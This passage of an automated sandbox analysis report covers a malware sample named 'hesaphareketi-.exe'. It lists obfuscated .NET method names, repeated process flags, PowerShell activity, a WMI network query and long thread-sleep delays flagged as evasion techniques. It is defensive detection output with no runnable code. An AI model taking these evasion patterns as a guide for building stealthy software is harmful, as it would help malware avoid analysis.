                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, ON4CPXgoxV3DOvXlQ5.csHigh entropy of concatenated method names: 'k5iyG1cZBi', 'KQny0YEH2x', 'niYyamQWfY', 'q6gy9cUH4R', 'XgyyZLKmPb', 'WbTym5FWFj', 'dTqebX5xvev3HEc98g', 'R0uMN1WgtaZTc9Nc5O', 'v3Fyyq00mB', 'N26yIYWngm'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, PlruwwFSFIBK3gOuLd.csHigh entropy of concatenated method names: 'es3Rau1EMH', 'FBbR9OnXuQ', 'ToString', 'OquRFeKa6W', 'ImbRrO3PEk', 'nSvRuM5G26', 'hfERNpdWx7', 'Yt4RD4xrV4', 'ngIRGaqaRe', 'qjgR0t4ZyV'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.csHigh entropy of concatenated method names: 'mpRIPb1xbw', 'lywIF84dei', 'UIbIryE6JI', 'pxsIuLDrEk', 'BlrINROGGm', 'bcwID1NyU2', 'TGNIGdXspo', 'fNII0cJ2vm', 'FYHIJMZyv1', 'Gp5IaSaIXy'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, fVLyc0wGGeEWOEyCIF.csHigh entropy of concatenated method names: 'ToString', 'q5Kmt4iijv', 'e5rmOAOR2H', 'MykmLY8Tkm', 'tfsm3ZkqKd', 'VE7mYSFosR', 'SZRmhY3L48', 'Km2mfbHgu9', 'Hf8mkfAhFJ', 'ejymWvqasA'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, LnxKS42KcnqItRqAuu.csHigh entropy of concatenated method names: 'Dispose', 'XWiyllSwLx', 'PEYdOwCRtM', 'w5Vyysa243', 'fYwyMGOgX8', 'sJEyzwgtve', 'ProcessDialogKey', 'jk6ds2SYkm', 'ClqdybiHbe', 'o7LddJmdgE'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, LWO8HtWIprHTVfDJ67.csHigh entropy of concatenated method names: 'lUHcFpUWvN', 'i0LcracVbs', 'LpQcugyeoE', 'WnhcNJdsPJ', 'W80cDwPhZT', 'oNGcG0LnZa', 'KOFc08Nf3A', 'a6AcJDroc5', 'GtYcaMOp3o', 'vDQc9awuE2'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, BNsSQdbVfiKRX0TD04.csHigh entropy of concatenated method names: 'Fcdu1pnCE5', 'rA3uqHqgOY', 'QcWuB9AAJa', 'kY5uQ4EJIX', 'iqAuZEWVpV', 'kP2umN5yci', 'gn6uRIrgmc', 'rRIucGu9Cy', 'YlxuU1mRJ9', 'sPpuSWQVY2'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, Yx3ZQZz8qF3UpkSV59.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CryUAGi7Zg', 'TX0UZTqhR6', 'y9eUmjDlRQ', 'rYOURDcnIL', 'CU6UcoN2lB', 'BHeUUkC0ju', 'p0PUS9SBSP'

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: A20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 25B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 45B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 7C00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 8C00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 8DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 9DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: CF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 2A70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 1070000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 239890
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 239781
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1200000
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199891
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199777
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199656
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199547
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199437
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199328
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199219
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199109
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199000
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198891
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198779
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198672
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198562
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198453
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198343
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198234
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198120
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197993
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197875
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197765
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197656
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197547
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197422
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197312
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197203
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197083
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196953
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196843
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196734
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196625
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196515
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196403
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196297
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196187
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196078
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195969
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195844
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195700
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195592
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195482
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195375
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195266
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195156
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195019
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194891
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194766
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194641
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194531
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194422
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Window / User API: threadDelayed 598
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Window / User API: threadDelayed 967
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5665
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4022
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Window / User API: threadDelayed 1561
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Window / User API: threadDelayed 8285
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440 Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440 Thread sleep time: -239890s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440 Thread sleep time: -239781s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 6580 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4644 Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199891s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199777s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199656s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199547s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199437s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199328s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199219s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199109s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1199000s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198891s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198779s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198672s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198562s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198453s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198343s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198234s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1198120s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197993s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197875s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197765s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197656s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197547s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197422s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197312s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197203s >= -30000s
